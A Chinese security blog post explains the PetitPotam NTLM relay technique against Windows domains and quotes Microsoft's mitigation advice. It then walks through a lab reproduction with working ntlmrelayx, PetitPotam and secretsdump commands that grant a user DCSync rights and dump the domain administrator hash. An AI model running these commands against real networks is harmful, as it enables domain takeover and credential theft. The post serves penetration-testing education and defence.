利用PetitPotam进行NTLM Relay攻击

admin 2021年12月8日11:15:30评论192 views字数 1272阅读4分14秒阅读模式
利用PetitPotam进行NTLM Relay攻击
利用PetitPotam进行NTLM Relay攻击



    2021年7月19日,法国安全研究人员Gilles Lionel披露了一种新型的NTLM Relay攻击利用手法——PetitPotam。该漏洞利用了微软加密文件系统远程协议(MS-EFSRPC,MicroSoft Encrypting File System Remote Protocol)。MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。利用该漏洞,黑客通过连接到LSARPC强制触发目标机器向指定远程服务器发送Net-NTLM Hash,从而攻击者在拿到Net-NTLM Hash后能进行NTLM Relay攻击,进而接管整个域。该漏洞可以用于替代Printerbug。


项目地址:https://github.com/topotam/PetitPotam


利用PetitPotam进行NTLM Relay攻击


虽然禁用对 MS-EFSRPC 的支持并不能阻止攻击运行,但微软随后发布了针对该问题的缓解措施,同时将“PetitPotam”描述为“经典的 NTLM 中继攻击”,它允许匿名(低版本系统)/具有网络访问权限的攻击者拦截合法客户端和服务器之间的身份验证流量,并中继那些经过验证的身份验证请求以访问网络服务。

微软指出:“为了防止在启用了 NTLM 的网络上发生 NTLM 中继攻击,域管理员必须确保允许 NTLM 身份验证的服务使用诸如扩展身份验证保护 (EPA) 或签名功能(如 SMB 签名)之类的保护措施。” 


利用PetitPotam进行NTLM Relay攻击
漏洞复现


这里以CVE-2019-1040 NTLM 降级漏洞作为一个演示。

首先使用ntlmrelayx脚本进行监听



利用PetitPotam进行NTLM Relay攻击

python3 ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.211.55.4 -smb2support



  • --remove-mic选项用于清除MIC标志

  • --escalate-user用于赋予指定用户dcsync权限

  • -smb2support 用于支持SMB2协议

  • -t 将认证凭据中继到指定ldap


利用PetitPotam进行NTLM Relay攻击


然后使用Petitpotam脚本进行攻击,第一个ip是回调的ip,第二个ip是攻击目标的ip。



利用PetitPotam进行NTLM Relay攻击

python3 Petitpotam.py -d xie.com -u hack -p P@ss1234 10.211.55.2 10.211.55.5



利用PetitPotam进行NTLM Relay攻击


或者使用exe进行攻击,需要在域内机器上执行该exe



利用PetitPotam进行NTLM Relay攻击

PetitPotam.exe 10.211.55.2 10.211.55.5



利用PetitPotam进行NTLM Relay攻击


攻击成功后即可利用。



利用PetitPotam进行NTLM Relay攻击

python3 secretsdump.py xie.com/hack:P@[email protected] -dc-ip 10.211.55.4 -just-dc-user administrator



如下图是攻击前和攻击后,攻击后hack用户即拥有导出域内所有用户哈希的权限。


利用PetitPotam进行NTLM Relay攻击



利用PetitPotam进行NTLM Relay攻击

如果想跟我一起讨论,那快加入我的知识星球吧!https://t.zsxq.com/7MnIAM7


利用PetitPotam进行NTLM Relay攻击


本文始发于微信公众号(谢公子学安全):利用PetitPotam进行NTLM Relay攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月8日11:15:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用PetitPotam进行NTLM Relay攻击https://cn-sec.com/archives/460677.html

发表评论

匿名网友 填写信息